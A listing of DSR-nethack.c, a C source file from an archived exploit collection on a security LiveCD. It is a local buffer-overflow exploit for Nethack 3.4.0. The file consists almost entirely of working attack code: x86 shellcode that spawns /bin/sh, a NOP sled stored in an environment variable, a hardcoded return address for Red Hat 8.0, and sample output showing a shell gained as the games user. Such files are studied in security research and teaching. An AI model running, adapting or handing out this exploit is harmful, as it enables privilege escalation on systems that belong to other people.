home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / nethack / DSR-nethack.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  62 lines
  1. /* DSR-nethack.c by bob@dtors.net
  2.  * Vulnerbility Found by tsao.
  3.  *
  4.  * Local BufferOverflow that leads
  5.  * to elevated privileges [games].
  6.  *
  7.  * Basic PoC code...nothing special.
  8.  *[bob@dtors bob]$ ./DSR-nethack
  9.  *
  10.  *       DSR-nethack.c By bob.
  11.  *   Local Exploit for Nethack 3.4.0
  12.  *       DSR-[www.dtors.net]-DSR
  13.  * 
  14.  *   ret: 0xbffffd86
  15.  *
  16.  * Cannot find any current entries for 
  17. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.² ┐
  18.  * Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]
  19.  * Player types are: [-p role] [-r race]
  20.  * sh-2.05b$ id -a
  21.  * uid=12(games) gid=501(bob) groups=501(bob)
  22.  * sh-2.05b$ 
  23.  *
  24.  * www.dtors.net // www.b0f.net
  25.  */
  26. #include <stdio.h>
  27. char shellcode[]= /* shellcode by bob */
  28.             
  29. "\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80" //minus
  30. "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
  31. "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";
  32. int main ()
  33. {
  34.         unsigned long ret = 0xbffffd86;  //Redhat 8.0 i386
  35.         char buf[224]; 
  36.         char smeg[1024];
  37.         char *ptr;      
  38.   int i=0;   
  39. fprintf(stdout, "\n\tDSR-nethack.c By bob.\n"); 
  40. fprintf(stdout, "Local Exploit for Nethack 3.4.0\n");
  41. fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
  42.  
  43. memset(buf, 0x41, sizeof(buf)); 
  44.         ptr = smeg; 
  45.         for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90; 
  46.         for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; 
  47.         smeg[1024 - 1] = '\0'; //null byte
  48.         memcpy(smeg,"EGG=",4); 
  49.         putenv(smeg);
  50.         buf[220] = (ret & 0x000000ff);            
  51.         buf[221] = (ret & 0x0000ff00) >> 8;
  52.         buf[222] = (ret & 0x00ff0000) >> 16;
  53.         buf[223] = (ret & 0xff000000) >> 24;
  54.         buf[224] = '\0';
  55.         
  56.         fprintf(stdout,"ret: 0x%08x\n",ret);
  57.         
  58.         execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s",  buf, 
  59. NULL); //weeoooweeeeooowooo
  60.         return 0;
  61. }
  62.